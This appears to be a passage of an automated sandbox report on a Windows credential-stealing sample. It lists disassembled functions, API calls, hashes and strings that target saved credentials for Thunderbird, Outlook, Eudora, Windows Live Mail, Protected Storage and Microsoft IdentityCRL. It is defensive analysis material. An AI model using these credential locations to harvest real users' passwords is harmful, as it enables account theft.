                                                                                      • sprintf.MSVCRT ref: 00402030
                                                                                        • Part of subcall function 00410B1E: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 00410B57
                                                                                      • memset.MSVCRT ref: 00402086
                                                                                      • memset.MSVCRT ref: 0040209B
                                                                                      • strlen.MSVCRT ref: 004020A1
                                                                                      • strlen.MSVCRT ref: 004020AF
                                                                                      • strlen.MSVCRT ref: 004020E2
                                                                                      • strlen.MSVCRT ref: 004020F0
                                                                                      • memset.MSVCRT ref: 00402018
                                                                                        • Part of subcall function 004070E3: _mbscpy.MSVCRT(00000000,00000000,sqlite3.dll,00402116,00000000,nss3.dll), ref: 004070EB
                                                                                        • Part of subcall function 004070E3: _mbscat.MSVCRT ref: 004070FA
                                                                                      • _mbscpy.MSVCRT(?,00000000), ref: 00402177
                                                                                      • RegCloseKey.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00402181
                                                                                      • ExpandEnvironmentStringsA.KERNEL32(%programfiles%\Mozilla Thunderbird,?,00000104,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040219C
                                                                                        • Part of subcall function 00406F81: GetFileAttributesA.KERNELBASE(?,00409675,?,0040972B,00000000,?,00000000,00000104,?), ref: 00406F85
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3659277113.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.3659277113.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3659277113.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: strlen$memset$Close_mbscpy$AttributesEnvironmentExpandFileStrings_mbscatatoisprintf
                                                                                      • String ID: %programfiles%\Mozilla Thunderbird$%s\Main$Install Directory$Mozilla\Profiles$Software\Classes\Software\Qualcomm\Eudora\CommandLine\current$Software\Mozilla\Mozilla Thunderbird$Software\Qualcomm\Eudora\CommandLine$Thunderbird\Profiles$current$nss3.dll$sqlite3.dll
                                                                                      • API String ID: 1846531875-4223776976
                                                                                      • Opcode ID: 1d5c9e5188f6b082a2305a72209a31590191ad01f9a44e6bfeac10cb5ccfbbc2
                                                                                      • Instruction ID: 9c65708a615aa9161e76439fb3ec4404e3c7586a7422c94cf2faf2b42662f59f
                                                                                      • Opcode Fuzzy Hash: 1d5c9e5188f6b082a2305a72209a31590191ad01f9a44e6bfeac10cb5ccfbbc2
                                                                                      • Instruction Fuzzy Hash: 2291193290515D6AEB21D6618C86FDE77AC9F58304F1400FBF508F2182EB78EB858B6D

                                                                                      Control-flow Graph

                                                                                      APIs
                                                                                        • Part of subcall function 00404A99: LoadLibraryA.KERNEL32(comctl32.dll,75920A60,?,00000000,?,?,?,0040CF60,75920A60), ref: 00404AB8
                                                                                        • Part of subcall function 00404A99: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00404ACA
                                                                                        • Part of subcall function 00404A99: FreeLibrary.KERNEL32(00000000,?,00000000,?,?,?,0040CF60,75920A60), ref: 00404ADE
                                                                                        • Part of subcall function 00404A99: MessageBoxA.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404B09
                                                                                      • ??3@YAXPAX@Z.MSVCRT(?), ref: 0040D190
                                                                                      • DeleteObject.GDI32(?), ref: 0040D1A6
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3659277113.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.3659277113.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3659277113.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: Library$??3@AddressDeleteFreeLoadMessageObjectProc
                                                                                      • String ID: $/deleteregkey$/savelangfile$Error$Failed to load the executable file !
                                                                                      • API String ID: 745651260-375988210
                                                                                      • Opcode ID: 66dab05e126b40913f404dced1d7a1b7c9917f067a9e41187f19818bfede1135
                                                                                      • Instruction ID: dea5423bbc6b84474d5379bd8edfb36e55d4f41410ab6b686afcfd17116e90de
                                                                                      • Opcode Fuzzy Hash: 66dab05e126b40913f404dced1d7a1b7c9917f067a9e41187f19818bfede1135
                                                                                      • Instruction Fuzzy Hash: 0A61AF71908345EBD7609FA1EC89A9FB7E8FF85704F00093FF544A21A1DB789805CB5A

                                                                                      Control-flow Graph

                                                                                      APIs
                                                                                        • Part of subcall function 004107F1: FreeLibrary.KERNELBASE(?,00410825,?,?,?,?,?,?,004041C4), ref: 004107FD
                                                                                      • LoadLibraryA.KERNELBASE(pstorec.dll), ref: 00403C35
                                                                                      • GetProcAddress.KERNEL32(00000000,PStoreCreateInstance), ref: 00403C4A
                                                                                      • _mbscpy.MSVCRT(?,?), ref: 00403E54
                                                                                      Strings
                                                                                      • Software\Microsoft\Internet Account Manager\Accounts, xrefs: 00403CD6
                                                                                      • Software\Microsoft\Windows Messaging Subsystem\Profiles, xrefs: 00403D3B
                                                                                      • Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts, xrefs: 00403CFB
                                                                                      • www.google.com:443/Please log in to your Gmail account, xrefs: 00403C90
                                                                                      • www.google.com:443/Please log in to your Google Account, xrefs: 00403CA4
                                                                                      • pstorec.dll, xrefs: 00403C30
                                                                                      • PStoreCreateInstance, xrefs: 00403C44
                                                                                      • Software\Microsoft\Office\16.0\Outlook\Profiles, xrefs: 00403DA4
                                                                                      • Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles, xrefs: 00403D42
                                                                                      • www.google.com/Please log in to your Gmail account, xrefs: 00403C86
                                                                                      • www.google.com/Please log in to your Google Account, xrefs: 00403C9A
                                                                                      • Software\Microsoft\Office\15.0\Outlook\Profiles, xrefs: 00403D6E
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3659277113.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.3659277113.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3659277113.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: Library$AddressFreeLoadProc_mbscpy
                                                                                      • String ID: PStoreCreateInstance$Software\Microsoft\Internet Account Manager\Accounts$Software\Microsoft\Office\15.0\Outlook\Profiles$Software\Microsoft\Office\16.0\Outlook\Profiles$Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts$Software\Microsoft\Windows Messaging Subsystem\Profiles$Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles$pstorec.dll$www.google.com/Please log in to your Gmail account$www.google.com/Please log in to your Google Account$www.google.com:443/Please log in to your Gmail account$www.google.com:443/Please log in to your Google Account
                                                                                      • API String ID: 1197458902-317895162
                                                                                      • Opcode ID: ad300f429030269d79da7f29e18846d437bf74986d1cc708d4c29655c4209bd3
                                                                                      • Instruction ID: f12475a9e901df39a06d2b9041e3ab5decda6d4897279b708da5bb949cd86342
                                                                                      • Opcode Fuzzy Hash: ad300f429030269d79da7f29e18846d437bf74986d1cc708d4c29655c4209bd3
                                                                                      • Instruction Fuzzy Hash: 7C51C971600201B6E714EF71CD86FDAB66CAF01709F14013FF915B61C2DBBDA658C699

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 231 44b49f-44b4b0 call 444e38 GetModuleHandleA 235 444c87-444d00 __set_app_type __p__fmode __p__commode call 444e34 231->235 236 444c68-444c73 231->236 242 444d02-444d0d __setusermatherr 235->242 243 444d0e-444d68 call 444e22 _initterm __getmainargs _initterm 235->243 236->235 237 444c75-444c85 236->237 237->235 242->243 246 444d6a-444d72 243->246 247 444d74-444d76 246->247 248 444d78-444d7b 246->248 247->246 247->248 249 444d81-444d85 248->249 250 444d7d-444d7e 248->250 251 444d87-444d89 249->251 252 444d8b-444dc6 GetStartupInfoA GetModuleHandleA call 40cf44 249->252 250->249 251->250 251->252 257 444dcf-444e0f _cexit call 444e71 252->257 258 444dc8-444dc9 exit 252->258 258->257
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3659277113.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.3659277113.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3659277113.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: HandleModule_initterm$InfoStartup__getmainargs__p__commode__p__fmode__set_app_type__setusermatherr_cexitexit
                                                                                      • String ID: h4ND$k:v
                                                                                      • API String ID: 3662548030-573399994
                                                                                      • Opcode ID: 2fd2f5ec857dcc0751115c7934250d8e7778a8a50373ba8a776a572aa6a6b888
                                                                                      • Instruction ID: 35bbd85eb0bb2ce5e1f1b9c4bc8677619723fc104b62ea38f54f9f601267cc63
                                                                                      • Opcode Fuzzy Hash: 2fd2f5ec857dcc0751115c7934250d8e7778a8a50373ba8a776a572aa6a6b888
                                                                                      • Instruction Fuzzy Hash: D941D3B5C023449FEB619FA4DC847AD7BB4FB49325B28412BE451A32A1D7788D41CB5C

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 262 40fb00-40fb35 call 44b090 RegOpenKeyExA 265 40fc37-40fc3d 262->265 266 40fb3b-40fb4f RegOpenKeyExA 262->266 267 40fb55-40fb7e RegQueryValueExA 266->267 268 40fc2d-40fc31 RegCloseKey 266->268 269 40fc23-40fc27 RegCloseKey 267->269 270 40fb84-40fb93 call 404734 267->270 268->265 269->268 270->269 273 40fb99-40fbd1 call 4047a5 270->273 273->269 276 40fbd3-40fbdb 273->276 277 40fc19-40fc1d LocalFree 276->277 278 40fbdd-40fc14 memcpy * 2 call 40f802 276->278 277->269 278->277
                                                                                      APIs
                                                                                      • RegOpenKeyExA.KERNELBASE(80000001,Software\Microsoft\IdentityCRL,00000000,00020019,?,?,?,?,?,00403E7F,?), ref: 0040FB31
                                                                                      • RegOpenKeyExA.KERNELBASE(?,Dynamic Salt,00000000,00020019,?,?,?,?,?,00403E7F,?), ref: 0040FB4B
                                                                                      • RegQueryValueExA.ADVAPI32(?,Value,00000000,?,?,?,?,?,?,?,00403E7F,?), ref: 0040FB76
                                                                                      • RegCloseKey.ADVAPI32(?,?,?,?,?,00403E7F,?), ref: 0040FC27
                                                                                        • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                                                        • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                                                      • memcpy.MSVCRT(?,%GKP$^%^&LL(%^$^O&TR$^%^GV6;lxzd,00000040,?,00001000,?,?,?,?,?,00403E7F,?), ref: 0040FBE4
                                                                                      • memcpy.MSVCRT(?,?,?), ref: 0040FBF9
                                                                                        • Part of subcall function 0040F802: RegOpenKeyExA.ADVAPI32(0040FC19,Creds,00000000,00020019,0040FC19,%GKP$^%^&LL(%^$^O&TR$^%^GV6;lxzd,00000040,?,?,0040FC19,?,?,?,?), ref: 0040F82C
                                                                                        • Part of subcall function 0040F802: memset.MSVCRT ref: 0040F84A
                                                                                        • Part of subcall function 0040F802: RegEnumKeyA.ADVAPI32(?,00000000,?,000000FF), ref: 0040F94E
                                                                                        • Part of subcall function 0040F802: RegCloseKey.ADVAPI32(?), ref: 0040F95F
                                                                                      • LocalFree.KERNEL32(?,?,00001000,?,?,?,?,?,00403E7F,?), ref: 0040FC1D
                                                                                      • RegCloseKey.KERNELBASE(?,?,?,?,?,00403E7F,?), ref: 0040FC31
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3659277113.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.3659277113.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3659277113.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: CloseOpen$memcpy$AddressEnumFreeLibraryLoadLocalProcQueryValuememset
                                                                                      • String ID: %GKP$^%^&LL(%^$^O&TR$^%^GV6;lxzd$Dynamic Salt$Software\Microsoft\IdentityCRL$Value
                                                                                      • API String ID: 2768085393-1693574875
                                                                                      • Opcode ID: 7320e33f30be2fbc30f5bd1c4a58e072b2ce45667eb80885bc3b0e2d1fc45eb5
                                                                                      • Instruction ID: dc42a4d3869b5799c80e2b369f36587618a74ee4c7744a3ab9dbe2425e101413
                                                                                      • Opcode Fuzzy Hash: 7320e33f30be2fbc30f5bd1c4a58e072b2ce45667eb80885bc3b0e2d1fc45eb5
                                                                                      • Instruction Fuzzy Hash: BA316F72508348AFE750DF51DC81E5BBBECFB88358F04093EBA94E2151D735D9188B6A

                                                                                      Control-flow Graph

                                                                                      APIs
                                                                                      • memset.MSVCRT ref: 0044430B
                                                                                        • Part of subcall function 0040759E: strlen.MSVCRT ref: 004075A0
                                                                                        • Part of subcall function 0040759E: strlen.MSVCRT ref: 004075AB
                                                                                        • Part of subcall function 0040759E: _mbscat.MSVCRT ref: 004075C2
                                                                                        • Part of subcall function 00410DBB: memset.MSVCRT ref: 00410E10
                                                                                        • Part of subcall function 00410DBB: RegCloseKey.ADVAPI32(00000000,?,?,?,?,?,?,?,?,00000104), ref: 00410E79
                                                                                        • Part of subcall function 00410DBB: _mbscpy.MSVCRT(00000000,?,?,?,?,?,?,00000104), ref: 00410E87
                                                                                      • memset.MSVCRT ref: 00444379
                                                                                      • memset.MSVCRT ref: 00444394
                                                                                        • Part of subcall function 00410B1E: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 00410B57
                                                                                      • ExpandEnvironmentStringsA.KERNEL32(?,?,00000104,?,?,?,?,?,?,00000000,00000104,00000104,?,?,?,?), ref: 004443CD
                                                                                      • strlen.MSVCRT ref: 004443DB
                                                                                      • _strcmpi.MSVCRT ref: 00444401
                                                                                      Strings
                                                                                      • Software\Microsoft\Windows Live Mail, xrefs: 004443AA
                                                                                      • \Microsoft\Windows Live Mail, xrefs: 00444350
                                                                                      • \Microsoft\Windows Mail, xrefs: 00444329
                                                                                      • Store Root, xrefs: 004443A5
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3659277113.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.3659277113.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3659277113.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: memset$strlen$Close$EnvironmentExpandStrings_mbscat_mbscpy_strcmpi
                                                                                      • String ID: Software\Microsoft\Windows Live Mail$Store Root$\Microsoft\Windows Live Mail$\Microsoft\Windows Mail
                                                                                      • API String ID: 832325562-2578778931
                                                                                      • Opcode ID: f06a6af35cb714c64aa9cbb6cf4603c577f85108f01cf4c992da9f1fa1720a8e
                                                                                      • Instruction ID: c969096c6c8075cae9da81fbffcb27ba025b1fc1210c9b39c3855a2ab2b3ab2e
                                                                                      • Opcode Fuzzy Hash: f06a6af35cb714c64aa9cbb6cf4603c577f85108f01cf4c992da9f1fa1720a8e
                                                                                      • Instruction Fuzzy Hash: A73197725083446BE320EA99DC47FCBB7DC9B85315F14441FF64897182D678E548877A

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 301 40f460-40f5bd memset * 2 call 4078ba * 2 RegOpenKeyExA 306 40f5c3-40f5ea RegQueryValueExA 301->306 307 40f6d9-40f6df 301->307 308 40f6d0-40f6d3 RegCloseKey 306->308 309 40f5f0-40f5f4 306->309 308->307 309->308 310 40f5fa-40f604 309->310 311 40f606-40f618 call 40466b call 404734 310->311 312 40f677 310->312 322 40f66a-40f675 call 404785 311->322 323 40f61a-40f63e call 4047a5 311->323 313 40f67a-40f67d 312->313 313->308 315 40f67f-40f6bf call 4012ee RegQueryValueExA 313->315 315->308 321 40f6c1-40f6cf 315->321 321->308 322->313 323->322 328 40f640-40f643 323->328 329 40f661-40f664 LocalFree 328->329 330 40f645-40f65a memcpy 328->330 329->322 330->329
                                                                                      APIs
                                                                                      • memset.MSVCRT ref: 0040F567
                                                                                      • memset.MSVCRT ref: 0040F57F
                                                                                        • Part of subcall function 004078BA: _mbsnbcat.MSVCRT ref: 004078DA
                                                                                      • RegOpenKeyExA.KERNELBASE(80000001,00000082,00000000,00020019,?,?,?,?,?,00000000), ref: 0040F5B5
                                                                                      • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,00000082,?,?,?,?,00000000), ref: 0040F5E2
                                                                                      • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,000000BE,000000BE,?,?,?,?,00000000), ref: 0040F6B7
                                                                                        • Part of subcall function 0040466B: _mbscpy.MSVCRT ref: 004046BA
                                                                                        • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                                                        • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                                                      • memcpy.MSVCRT(00000020,?,?,?,00000000,?,?,?,?,?,00000000), ref: 0040F652
                                                                                      • LocalFree.KERNEL32(?,?,00000000,?,?,?,?,?,00000000), ref: 0040F664
                                                                                      • RegCloseKey.ADVAPI32(?,?,?,?,?,00000000), ref: 0040F6D3
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3659277113.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.3659277113.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3659277113.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: QueryValuememset$AddressCloseFreeLibraryLoadLocalOpenProc_mbscpy_mbsnbcatmemcpy
                                                                                      • String ID:
                                                                                      • API String ID: 2012582556-3916222277
                                                                                      • Opcode ID: 8f617e2db47743eab2de2860531f70ca5c395556099eb0f489e65365eb291258
                                                                                      • Instruction ID: 8a535e2a1d92942c08e22e27bc62a3a9d9c5418ddd7b2e408e782496f1cf9495
                                                                                      • Opcode Fuzzy Hash: 8f617e2db47743eab2de2860531f70ca5c395556099eb0f489e65365eb291258
                                                                                      • Instruction Fuzzy Hash: 9E81FC218047CEDEDB31DBBC8C485DDBF745B17224F0843A9E5B47A2E2D3245646C7AA

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 331 4037ca-40381c memset * 2 call 444551 334 4038e2-4038e5 331->334 335 403822-403882 call 4021b6 call 406f06 * 2 strchr 331->335 342 403884-403895 _mbscpy 335->342 343 403897-4038a2 strlen 335->343 344 4038bf-4038dd _mbscpy call 4023e5 342->344 343->344 345 4038a4-4038bc sprintf 343->345 344->334 345->344
                                                                                      APIs
                                                                                      • memset.MSVCRT ref: 004037EB
                                                                                      • memset.MSVCRT ref: 004037FF
                                                                                        • Part of subcall function 00444551: memset.MSVCRT ref: 00444573
                                                                                        • Part of subcall function 00444551: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,000003FF), ref: 004445DF
                                                                                        • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                                                                        • Part of subcall function 00406F06: memcpy.MSVCRT(?,00401CA1,00000000,00000000,00401CA1,00000001,00000104,?,?,?,?,?,00000000), ref: 00406F20
                                                                                      • strchr.MSVCRT ref: 0040386E
                                                                                      • _mbscpy.MSVCRT(?,?,?,?,?), ref: 0040388B
                                                                                      • strlen.MSVCRT ref: 00403897
                                                                                      • sprintf.MSVCRT ref: 004038B7
                                                                                      • _mbscpy.MSVCRT(?,?,?,?,?), ref: 004038CD
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3659277113.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.3659277113.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3659277113.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: memset$_mbscpystrlen$Closememcpysprintfstrchr
                                                                                      • String ID: %s@yahoo.com
                                                                                      • API String ID: 317221925-3288273942
                                                                                      • Opcode ID: 5a56a1554c10d755001c1ca11538bf46cd5ff9b3743cfe338c5787e90ef4e93f
                                                                                      • Instruction ID: 76d3f49adc6711096ede71316d8c54080aa8a6e72e6628a7d10ff16d2d587f45
                                                                                      • Opcode Fuzzy Hash: 5a56a1554c10d755001c1ca11538bf46cd5ff9b3743cfe338c5787e90ef4e93f
                                                                                      • Instruction Fuzzy Hash: 4B2154B3D001285EEB11EA54DD42FDA77ACDF85308F0404EBB649F7041E678AF888A59

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 347 4034e4-403544 memset * 2 call 410b1e 350 403580-403582 347->350 351 403546-40357f _mbscpy call 406d55 _mbscat call 4033f0 347->351 351->350
                                                                                      APIs
                                                                                      • memset.MSVCRT ref: 00403504
                                                                                      • memset.MSVCRT ref: 0040351A
                                                                                        • Part of subcall function 00410B1E: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 00410B57
                                                                                      • _mbscpy.MSVCRT(00000000,00000000), ref: 00403555
                                                                                        • Part of subcall function 00406D55: strlen.MSVCRT ref: 00406D56
                                                                                        • Part of subcall function 00406D55: _mbscat.MSVCRT ref: 00406D6D
                                                                                      • _mbscat.MSVCRT ref: 0040356D
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3659277113.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.3659277113.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3659277113.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: _mbscatmemset$Close_mbscpystrlen
                                                                                      • String ID: InstallPath$Software\Group Mail$fb.dat
                                                                                      • API String ID: 3071782539-966475738
                                                                                      • Opcode ID: e8255885af10a91bc56e48e40ef87396276e308e7910b77f5f681434f29254a3
                                                                                      • Instruction ID: a2fd564f6d67a76fe1541fb13c78ccc0c8ee6374decffd3371ae058987aad369
                                                                                      • Opcode Fuzzy Hash: e8255885af10a91bc56e48e40ef87396276e308e7910b77f5f681434f29254a3
                                                                                      • Instruction Fuzzy Hash: C201FC7694416875E750F6659C47FCAB66CCB64705F0400A7BA48F30C2DAF8BBC486A9

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 356 40ccd7-40cd06 ??2@YAPAXI@Z 357 40cd08-40cd0d 356->357 358 40cd0f 356->358 359 40cd11-40cd24 ??2@YAPAXI@Z 357->359 358->359 360 40cd26-40cd2d call 404025 359->360 361 40cd2f 359->361 363 40cd31-40cd57 360->363 361->363 365 40cd66-40cdd9 call 407088 call 4019b5 memset LoadIconA call 4019b5 _mbscpy 363->365 366 40cd59-40cd60 DeleteObject 363->366 366->365
                                                                                      APIs
                                                                                      • ??2@YAPAXI@Z.MSVCRT(00000014,00000000), ref: 0040CCFE
                                                                                      • ??2@YAPAXI@Z.MSVCRT(00001324,00000000), ref: 0040CD1C
                                                                                      • DeleteObject.GDI32(?), ref: 0040CD5A
                                                                                      • memset.MSVCRT ref: 0040CD96
                                                                                      • LoadIconA.USER32(00000065), ref: 0040CDA6
                                                                                      • _mbscpy.MSVCRT(?,00000000,?,00000000), ref: 0040CDC4
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3659277113.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.3659277113.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3659277113.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: ??2@$DeleteIconLoadObject_mbscpymemset
                                                                                      • String ID:
                                                                                      • API String ID: 2054149589-0
                                                                                      • Opcode ID: fd02f05bf49073eee5ccc1a550db9cbce84ddbb83c717146c7427eb187f58741
                                                                                      • Instruction ID: e49e2262ea613e2b532621416bf92f05b9d60d1a181aada648b692035ce2a44d
                                                                                      • Opcode Fuzzy Hash: fd02f05bf49073eee5ccc1a550db9cbce84ddbb83c717146c7427eb187f58741
                                                                                      • Instruction Fuzzy Hash: C921A1B0900360DBDB10DF749DC97897BA8EB40B04F1405BBED08FF286D7B895408BA8

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 373 44b40e-44b415 GetModuleHandleA 374 44b455 373->374 375 44b417-44b426 call 44b42b 373->375 377 44b457-44b45b 374->377 384 44b48d 375->384 385 44b428-44b433 GetProcAddress 375->385 379 44b45d-44b465 GetModuleHandleA 377->379 380 44b49a call 44b49f 377->380 383 44b467-44b46f 379->383 383->383 386 44b471-44b474 383->386 388 44b48e-44b496 384->388 385->374 389 44b435-44b442 VirtualProtect 385->389 386->377 387 44b476-44b478 386->387 390 44b47e-44b486 387->390 391 44b47a-44b47c 387->391 397 44b498 388->397 393 44b454 389->393 394 44b444-44b452 VirtualProtect 389->394 395 44b487-44b488 GetProcAddress 390->395 391->395 393->374 394->393 395->384 397->386
                                                                                      APIs
                                                                                      • GetModuleHandleA.KERNEL32(0044B405), ref: 0044B40E
                                                                                      • GetModuleHandleA.KERNEL32(?,0044B405), ref: 0044B460
                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0044B488
                                                                                        • Part of subcall function 0044B42B: GetProcAddress.KERNEL32(00000000,0044B41C), ref: 0044B42C
                                                                                        • Part of subcall function 0044B42B: VirtualProtect.KERNELBASE(?,00000078,00000004,?,00000000,00000000,0044B41C,0044B405), ref: 0044B43E
                                                                                        • Part of subcall function 0044B42B: VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000000,00000000,0044B41C,0044B405), ref: 0044B452
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3659277113.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.3659277113.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3659277113.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: AddressHandleModuleProcProtectVirtual
                                                                                      • String ID:
                                                                                      • API String ID: 2099061454-0
                                                                                      • Opcode ID: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                                                      • Instruction ID: 5df47aada64e755ddaac71019e2cddcac14d14db73bdb0f929895f2225ac57a9
                                                                                      • Opcode Fuzzy Hash: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                                                      • Instruction Fuzzy Hash: DB012D01545A4179FF21AAB50C02ABB5F8CDA23364B145B4BF750CB293DB5CC90693FE

                                                                                      Control-flow Graph

                                                                                      APIs
                                                                                        • Part of subcall function 004082CD: memset.MSVCRT ref: 0040832F
                                                                                        • Part of subcall function 004082CD: memset.MSVCRT ref: 00408343
                                                                                        • Part of subcall function 004082CD: memset.MSVCRT ref: 0040835F
                                                                                        • Part of subcall function 004082CD: memset.MSVCRT ref: 00408376
                                                                                        • Part of subcall function 004082CD: GetComputerNameA.KERNEL32(?,?), ref: 00408398
